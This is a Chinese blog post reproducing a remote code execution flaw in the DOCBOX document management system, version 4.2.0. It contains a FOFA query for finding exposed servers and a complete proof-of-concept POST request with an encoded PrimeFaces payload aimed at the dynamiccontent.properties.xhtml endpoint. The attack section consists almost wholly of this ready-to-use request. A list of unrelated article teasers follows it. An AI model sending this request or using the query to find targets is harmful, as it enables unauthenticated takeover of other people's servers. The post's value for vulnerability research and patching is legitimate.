DOCBOX dynamiccontent.properties.xhtml RCE漏洞复现

0x01 产品简介

 DOCBOX是一款具有恢复保证的文档管理系统,高效、快如闪电、防审核、简单,从模拟切换到数字并使用 DOCBOX® 归档您的文档。

0x02 漏洞概述

  DOCBOX电子文档管理系统4.2.0版本中dynamiccontent.properties.xhtml接口存在远程代码执行漏洞,未经身份认证的攻击者可以获取服务器权限。

0x03 复现环境

FOFA:body="docbox.webapp"

0x04 漏洞复现

PoC

POST /docbox.webapp/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fE

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/222856.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

MS8051运算放大器可Pin to Pin兼容AD8051/AD8052/AD8054

MS805x 系列为轨到轨输出的电压反馈运算放大器,具有易用、低成本等特点。可Pin to Pin兼容AD8051/AD8052/AD8054。相比于典型的电流反馈放大器,在带宽和转换率有更大的优势,并同时具备宽的输入共模电压范围和大的输出电压摆幅,这使…

go这么好用的pprof包却引发了安全漏洞?规避pprof自动注册默认url

文章目录 背景介绍问题分析解决方案1.起一个新的http server,不使用默认对象2.修改http默认对象3.既然源码这么坑,把源码捞出来改成自己想要的。背景介绍 最近项目在线上被检测出有pprof有漏洞,原因是产品对外暴露的端口,可以通过http://ip:prot/debug/pprof/profile,获取…

java.lang.UnsupportedOperationException解决方法

问题描述 在实际开发中经常会有类似的这种代码,想要按类的某一个属性对列表中的元素分组。 例如: 有一些学生,然后根绝他们的年龄对他们进行分组。可以写出如下代码。 public class UnsupportedOperationExceptionDemo {DataNoArgsConstru…

vue 过滤器 (filters) ,实际开发中的使用

在实际开发中要判断不同的状态,要写很多重复的代码, 类似这样: 这样学麻烦, 不方便维护, 这时候可以用 filters 过滤器 在页面这样写就可以了

Magna EDI 项目案例

麦格纳Magna是加拿大的一家国际性汽车零配件制造商,主要为乘用车/轻型商用车制造商生产和销售外饰/结构件、动力总成系统、电子系统、座椅系统、底盘、ADAS、闭锁系统、后视镜、车灯、车顶等产品,此外还提供整车工程和代工生产服务。 Magna与其全球合作伙…

周大福传世杰作「裕世钻芳华」首次亮相“超越时光”天然钻石展

(2023年12月6日,北京)天然钻石,是自地球深处历经数十亿年时光形成的自然奇迹,在悠长的岁月中见证了无数真挚情感的珍贵瞬间。12月6日,“超越时光”周大福天然钻石展于北京凤凰国际传媒中心启幕,…

烟感监控:这个技巧是真的香,后悔没早点知道!

在现代社会,安全意识的提升成为各行各业关注的焦点之一。特别是在建筑、工业和住宅领域,火灾作为一种突发性、破坏性极强的灾害,给人们的生命和财产安全带来了巨大的威胁。 因此,为了有效预防和应对火灾,烟感监控系统逐…

Day51力扣打卡

打卡记录 Plus and Multiply(模拟) 链接 要满足 a x b ∗ y n a^x b * y n axb∗yn 的关系,可以枚举满足 b ∗ y n − a x b * y n - a ^ x b∗yn−ax 的可余条件。 t int(input()) for _ in range(t):n, a, b map(int, input().…

轮询分区的设置

终于可以写MPI了,没想到,刚开始就当头一棒,我按照之前的配置MPI环境,配置完成就报错 好家伙,仔细检查了每一个步骤都没找到问题,上网搜索了一些解决方案,也没有解决。所幸,在配置MPI…

netty07-粘包半包以及解决方案

粘包指的是发送方在发送数据时,多个数据包被合并成一个大的数据包发送到接收方,接收方在接收时无法准确地区分各个数据包的边界,从而导致数据粘在一起。 半包指的是发送方发送的数据包被拆分成了多个小的数据包,在接收方接收时&a…

C# Onnx 阿里达摩院开源DAMO-YOLO目标检测

效果 模型信息 Inputs ------------------------- name:images tensor:Float[1, 3, 192, 320] --------------------------------------------------------------- Outputs ------------------------- name:output tensor:Float…

批发订货系统一般有哪几种形式

批发订货系统一般有三种方式: 第一种是SaaS,这种方式软件厂商开一个账号,使用的企业仅使用里面的一个账号,给客户进行订货,有的甚至没有独立的小程序,需要进入软件厂商的APP进行订货,这种方法的…

从钓鱼邮件溯源到反制上线

背景 某天下午紧急接到一个溯源的活儿:客户收到一封可疑邮件,要求判断是否为钓鱼邮件,如果是钓鱼邮件,则要求尽可能找到人员信息。由于保密要求,所以部分信息必须厚码,请各位师傅见谅。 邮件内容如下&…

识别和修复网站上损坏链接的最佳实践

如果您有一个网站,我们知道您花了很多时间在它上面,以使其成为最好的资源。如果你的链接不起作用,你的努力可能是徒劳的。您网站上的断开链接可能会以两种方式损害您的业务: 它们对企业来说是可怕的,因为当消费者点击…

​DeepMind:开发出可以向人类学习的人工智能

Nature发表了一篇Google DeepMind的研究成果:研究人员在3D模拟环境中使用神经网络和强化学习,展示了AI智能体如何在没有直接从人类那里获取数据的情况下,通过观察来学习和模仿人类的行为。 这项研究被视为向人工通用智能(AGI&…

Google难架马甲多

今年谷歌上架的难度可谓是地狱级别。 可是国内马甲这么多,总要摸索出一些套路来。 这里总结几条开源aab混淆策略。 1、as自带混淆是必要的,否则就是源码提包,相当于到谷歌门口举个牌子说我是马甲包。 不仅要驳回,还要被封号。…

【Trino权威指南(第二版)】Trino介绍:trino解决大数带来的问题

文章目录 一. 大数据带来的问题二. Trino来救场1. 为性能和规模而生2. SQL-on-Anything3. 数据存储与查询计算资源分离 三. Trino使用场景 一. 大数据带来的问题 数据现状 数据存储机制日益多样:关系型数据库、NoSQL数据库、文档数据库、键值存储和对象存储系统等。…

Python中的并发编程(1)并发相关概念

并发和并行 并发和并行 并发指逻辑上同时处理多件事情,并行指实际上同时做多件事情。 并发不一定通过并行实现,也可以通过多任务实现。例如:现代操作系统都可以同时执行多个任务,比如同时听歌和玩游戏,但歌曲播放和游…

每日一练【查找总价格为目标值的两个商品】

一、题目描述 题目链接 购物车内的商品价格按照升序记录于数组 price。请在购物车中找到两个商品的价格总和刚好是 target。若存在多种情况,返回任一结果即可。 示例 1: 输入:price [3, 9, 12, 15], target 18 输出:[3,15] …

【MVP矩阵】投影矩阵推导与实现

相机空间和NDC空间示意图(来自奇乐编程学院) 相机坐标系一般都是右手坐标系, 相机朝向是 z 的负半轴 裁剪空间和NDC空间示意图 投影矩阵推导 【本文仅用于自身备忘】 正交投影推导结果如下 透视投影推导结果如下 备注 一般情况下,透…